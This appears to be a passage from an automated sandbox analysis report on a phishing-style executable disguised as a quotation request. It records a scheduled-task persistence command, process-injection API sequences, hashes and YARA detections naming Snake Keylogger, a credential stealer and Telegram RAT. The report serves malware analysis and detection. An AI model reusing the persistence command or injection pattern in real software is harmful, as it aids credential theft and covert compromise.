File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:20:08
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:20:08
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
Imagebase:	0x7f0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:20:08
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:20:09
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Imagebase:	0xd50000
File size:	1'017'856 bytes
MD5 hash:	1AE7A890014EBA9C807C6ADEABAC7671
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3829829868.00000000031DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	06:20:11
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
Imagebase:	0x9c0000
File size:	1'017'856 bytes
MD5 hash:	1AE7A890014EBA9C807C6ADEABAC7671
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:20:11
Start date:	21/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff72d8c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:20:14
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"
Imagebase:	0x7f0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:20:14
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:20:14
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Imagebase:	0x4a0000
File size:	1'017'856 bytes
MD5 hash:	1AE7A890014EBA9C807C6ADEABAC7671
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	06:21:56
Start date:	21/11/2024
Path:	C:\Windows\System32\wbem\WMIADAP.exe
Wow64 process (32bit):	false
Commandline:	wmiadap.exe /F /T /R
Imagebase:	0x7ff765e30000
File size:	182'272 bytes
MD5 hash:	1BFFABBD200C850E6346820E92B915DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	212
Total number of Limit Nodes:	11

Executed Functions

Function 0741CD7B Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea10155737baf14d7db4284597a40315176c9bbc1ccdabfab195cb7e63979fa5
Instruction ID: bd043526da493c2c2369379415a24dc180ba9ce99d714947e69313533c3ac42c
Opcode Fuzzy Hash: ea10155737baf14d7db4284597a40315176c9bbc1ccdabfab195cb7e63979fa5
Instruction Fuzzy Hash: 91E179B1B016068FDB25EB75D8A0BAEB7F6AFC9600F14446ED146DB390CB35E901CB61

Function 0741B66D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248521a72e2e6896f3f4f70eb169b2e03701883f132f21ad55c998fc09f849e2
Instruction ID: a8c7a9e0d383c8503a4dc861b8e57dfc5ef13264a8523f603fe7faf32828d687
Opcode Fuzzy Hash: 248521a72e2e6896f3f4f70eb169b2e03701883f132f21ad55c998fc09f849e2
Instruction Fuzzy Hash: 64D06CF492A104DAC750EF51D4865F8F7BCEB5B300F00A497880EA3222E6349A82CF85

Function 0153CF90 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0153D01E
GetCurrentThread.KERNEL32 ref: 0153D05B
GetCurrentProcess.KERNEL32 ref: 0153D098
GetCurrentThreadId.KERNEL32 ref: 0153D0F1

Memory Dump Source

Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 99e412c4362a543984b0153493a33e775b0469efdbe6e347e7e47446675de0ef
Instruction ID: 85ff7d930515357d1feb360ded08deab6a14386ad51a644a75a15c9dc9176a48
Opcode Fuzzy Hash: 99e412c4362a543984b0153493a33e775b0469efdbe6e347e7e47446675de0ef
Instruction Fuzzy Hash: 715187B09017498FEB14DFA9D448BDEBBF1BF88304F20845AD408BB3A0D7349944CB66

Function 0153CFA0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0153D01E
GetCurrentThread.KERNEL32 ref: 0153D05B
GetCurrentProcess.KERNEL32 ref: 0153D098
GetCurrentThreadId.KERNEL32 ref: 0153D0F1

Memory Dump Source

Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 233849624f632f756035ff5ac96c67b93503eb07ba602a2efcf249308a8885e7
Instruction ID: 3de4635d27e506c82d7a8902fff82d217d75e15556f41e65a84a6be8ace6e604
Opcode Fuzzy Hash: 233849624f632f756035ff5ac96c67b93503eb07ba602a2efcf249308a8885e7
Instruction Fuzzy Hash: AE5173B09017098FEB14DFAAD548B9EFBF1BF88310F208459E419BB390D774A944CB66

Function 07417B1C Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07417D5E

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ca1534945925b4207e53bb614950351ed89f15d8580aaeac271caf6b88f8b919
Instruction ID: 43339f5e3f2a51533b432522abeb1672f15e06c301a68ee53f5c4ba946683df5
Opcode Fuzzy Hash: ca1534945925b4207e53bb614950351ed89f15d8580aaeac271caf6b88f8b919
Instruction Fuzzy Hash: AFA15EB1D0031ACFEB25DF68C841BEEBBB2BF48314F14856AD859A7240DB749985CF91

Function 07417B28 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07417D5E

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cbd5df7787a875d474e08c29746a655d6f9c9d6b773b32651572c065af40a481
Instruction ID: 1513c8e6eb630670085f5ad179383f518ce9832bfcfe0762333a59d8c6ff9f4d
Opcode Fuzzy Hash: cbd5df7787a875d474e08c29746a655d6f9c9d6b773b32651572c065af40a481
Instruction Fuzzy Hash: 06915EB1D0031ACFEB25DF68C841BEEBBB2BF48314F14856AD859A7240DB749985CF91

Function 0153AD08 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0153AF5E

Memory Dump Source

Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0b8bc0576ac8674ef8eb554350f868c0ce0615982a841b1ca512a75c3478a769
Instruction ID: 64c8e61ac69aa74fd857f6df8bf30bc128b17c7170ec04ff78fbadeea5ce885e
Opcode Fuzzy Hash: 0b8bc0576ac8674ef8eb554350f868c0ce0615982a841b1ca512a75c3478a769
Instruction Fuzzy Hash: C1812570A00B058FE725DF2AD45475ABBF1FF88204F108A2DD49ADBA50D779E949CB90

Function 015358EC Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015359A9

Memory Dump Source

Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d4626969f961e7a3291e7e9b4894a91fd6eeff200ba710740b22485e4d0f44f3
Instruction ID: 1ce8416e22e8aff8a16d4f85938a70ba70d0da361583abe413a14c9ad44df92e
Opcode Fuzzy Hash: d4626969f961e7a3291e7e9b4894a91fd6eeff200ba710740b22485e4d0f44f3
Instruction Fuzzy Hash: EE41CFB1C10719CFEB24CFA9C884BDEBBB1BF89304F20816AD409AB255DB756946CF50

Function 015344B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015359A9

Memory Dump Source

Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6bcbaa00b424af66291102169668acae80ba15f356c34fdf5f3eb951edc4f924
Instruction ID: 7e6c95e4afcd6f9891b5e37511b2f8f9ef6f53ae37125c963ad061334a05c127
Opcode Fuzzy Hash: 6bcbaa00b424af66291102169668acae80ba15f356c34fdf5f3eb951edc4f924
Instruction Fuzzy Hash: 3F41BDB0C1071D8FEB24DFA9C844B9EBBB5BB89304F20806AD409AB251DB756946CF90

Function 07417898 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07417930

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d7bd04a9265a42bd957bf237f0705e20d480a201664507d257816873f08013c9
Instruction ID: 415527298a0be969d1d1e0f619b8e2a9cf0af08003a20097e83db6e68197156d
Opcode Fuzzy Hash: d7bd04a9265a42bd957bf237f0705e20d480a201664507d257816873f08013c9
Instruction Fuzzy Hash: D12168B2900349DFDB10DFA9C881BDEBBF5FF48310F10842AE959A7240C7789945CBA0

Function 07417988 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07417A10

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 54ef184db87cf7a79abeaaf911c3a0727516f69eb9b52fdea867726241db3940
Instruction ID: 6d37f932b6b1ad2fbb6ab711e53c0ffc2a0551329a9e898e5a620c14061fb805
Opcode Fuzzy Hash: 54ef184db87cf7a79abeaaf911c3a0727516f69eb9b52fdea867726241db3940
Instruction Fuzzy Hash: 2A2136B29003499FDB10DFAAC881BEEFBF5FF48310F54842AE958A7240D7799541CBA4

Function 074178A0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07417930

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: adfa4597349e7cd4473cef868d9fb81a1c910f4b3c5ba79d276b265060f86632
Instruction ID: 23ebf48db9cde09554b371be22c6a7ee89973586c9442baf93ddf19f33156dd6
Opcode Fuzzy Hash: adfa4597349e7cd4473cef868d9fb81a1c910f4b3c5ba79d276b265060f86632
Instruction Fuzzy Hash: 0D2127B2900349DFDB10DFA9C885BDEBBF5FF48310F54842AE959A7240C7789954CBA0

Function 074172C8 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0741734E

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2e8dbcc289269853a85ab766b9ca2e0cd0acbbe273637ab646f2198277132765
Instruction ID: 0d655d9764877d5a4e71e35ad3ba3a9fac3cb5b45fcaa19f42d9442abaee8608
Opcode Fuzzy Hash: 2e8dbcc289269853a85ab766b9ca2e0cd0acbbe273637ab646f2198277132765
Instruction Fuzzy Hash: 432159B29003098FDB10DFAAC4857EEBBF4EF48210F54842AD959A7340D7789645CFA1

Function 0153D5E8 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153D677

Memory Dump Source

Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3b810cf843830141393cf51fc51d81cd700855cfbdc84f12c393e779f60823fa
Instruction ID: b1d10ee4f4e284bf3f6def5f1f77549e50271635fe7567f86533c19832a3c928
Opcode Fuzzy Hash: 3b810cf843830141393cf51fc51d81cd700855cfbdc84f12c393e779f60823fa
Instruction Fuzzy Hash: DD21E9B5D00249DFDB10CF9AD485ADEBBF5FB48310F14842AE918A7350D374A950CFA5

Function 074172D0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0741734E

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 98ec58c79823986c7ac027528010bac5e4707727506818840983fe754bc9bf63
Instruction ID: a47e15679ad7ec0c984dfe6f320f59927b5e0217712c2633bc52d08188df14ff
Opcode Fuzzy Hash: 98ec58c79823986c7ac027528010bac5e4707727506818840983fe754bc9bf63
Instruction Fuzzy Hash: 132147B2D003098FDB10DFAAC4857EEBBF4EF48210F54842AD959A7340DB789A45CFA0

Function 07417990 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07417A10

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f3fc9af4ef1931ee1351ed6b83d55d4f198f515ee1fc4bfa1bf1d9b2c65780ca
Instruction ID: 71583eb6604927a9c787c6232212298fcb79a231ce66df3148f2f28fbc4abbfd
Opcode Fuzzy Hash: f3fc9af4ef1931ee1351ed6b83d55d4f198f515ee1fc4bfa1bf1d9b2c65780ca
Instruction Fuzzy Hash: DD2128B29003499FDB10DFAAC881BEEBBF5FF48310F54842AE558A7240D7799540CBA0

Function 0153D5F0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153D677

Memory Dump Source

Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6699a65ac61d1e9a7ce542cb53946fa10b4504b87ffbd55236976199996f0d82
Instruction ID: 1c794d9c986db5ba5730c8d86d950df5a32cb721a53a401e4b75269a2a23bbf0
Opcode Fuzzy Hash: 6699a65ac61d1e9a7ce542cb53946fa10b4504b87ffbd55236976199996f0d82
Instruction Fuzzy Hash: 8E21D5B5900249DFDB10CF9AD584ADEFBF5FB48310F14841AE918A7350D374A954CF65

Function 074177D8 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0741784E

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 86dc73b6f2d7f5c60827de722222b6a204ec61b2842adc52a431b540fe8db150
Instruction ID: 58e5bc5d9a46fbb62af9c52558f65539293c52f11eb363a7fac77aeb9e80de4f
Opcode Fuzzy Hash: 86dc73b6f2d7f5c60827de722222b6a204ec61b2842adc52a431b540fe8db150
Instruction Fuzzy Hash: F5216472800349DFDB10DFAAC844BEEBBF5EF48310F24882AE559A7250C7799945CBA0

Function 074177E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0741784E

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cf8ebfae3479dd44816556a6ecf8a2f3953c33df005bc8c1e08ea3674265d78d
Instruction ID: ef7276e0bae82ae984296c9c648ee0bf215f841246b8bdc7c8fa69eb9cfd4b1c
Opcode Fuzzy Hash: cf8ebfae3479dd44816556a6ecf8a2f3953c33df005bc8c1e08ea3674265d78d
Instruction Fuzzy Hash: DA1137729003499FDB10DFAAC845BDFBBF5EF48310F14882AE519A7250C7759550CFA0

Function 07416DE0 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07416E4A

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 07db19b83e7dc0e877c2b9db277756cc12f08dd858078d1c6a7b2bc7af37a1ba
Instruction ID: c5ccdf056554682db6044006e53dad76abb3ac0b19b663bbd8663c0baf412546
Opcode Fuzzy Hash: 07db19b83e7dc0e877c2b9db277756cc12f08dd858078d1c6a7b2bc7af37a1ba
Instruction Fuzzy Hash: 901158B29003498FDB10DFAAC4457EFFBF5EF49220F24842AD559A7240CB79A941CFA5

Function 07416DE8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07416E4A

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fba33f1ef292c5fbd5f9009b887b3982804e126dc896109c89efa4677b0aad2d
Instruction ID: b41c096e4545c2b23731fa905fb6c69e39f31521027fe41467074aa8f5bba75b
Opcode Fuzzy Hash: fba33f1ef292c5fbd5f9009b887b3982804e126dc896109c89efa4677b0aad2d
Instruction Fuzzy Hash: BE113AB19003498FDB10DFAAC4457DFFBF5EF48210F24842AD519A7240CB79A944CBA5

Function 07415FC0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0741C175

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2e9b6a0f1500085544b44e0b24055687951405ae74f776005269ea448de91404
Instruction ID: 2506db93c77ad4240b20aadf4d0cdfb94d09d104536049f3a8d863ac75708d7d
Opcode Fuzzy Hash: 2e9b6a0f1500085544b44e0b24055687951405ae74f776005269ea448de91404
Instruction Fuzzy Hash: C511F2B58403499FDB10DF9AC885BDEBBF8EB48310F10881AE918A7600C375A944CFA5

Function 0153AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0153AF5E

Memory Dump Source

Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9224c74becd9351df6479b02a0f4743943f5fc8cdfcf5abcc6e0b39b12d56b7e
Instruction ID: 26fc39c26e6a369bab84b595ef3a9e3c8de6d035e7793f31109c4e51da623b83
Opcode Fuzzy Hash: 9224c74becd9351df6479b02a0f4743943f5fc8cdfcf5abcc6e0b39b12d56b7e
Instruction Fuzzy Hash: 641110B6C006498FDB10CF9AC444BDEFBF4EB88214F10842AD868A7250C379A545CFA1

Function 0741C116 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0741C175

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8c06d8ffa251851bbe3ed52ceb8d309a558a50918eb841fa5e5b0a748da41102
Instruction ID: 59ca1fe4c1e87a0cc60c2f2577808e6412aa7f059776ab8a56e6ddf0ee96d407
Opcode Fuzzy Hash: 8c06d8ffa251851bbe3ed52ceb8d309a558a50918eb841fa5e5b0a748da41102
Instruction Fuzzy Hash: 4E1100B58003499FDB10DF9AC885BDEFBF8EB48320F20841AE958A3600D375A944CFA5

Function 0125D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1412338091.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

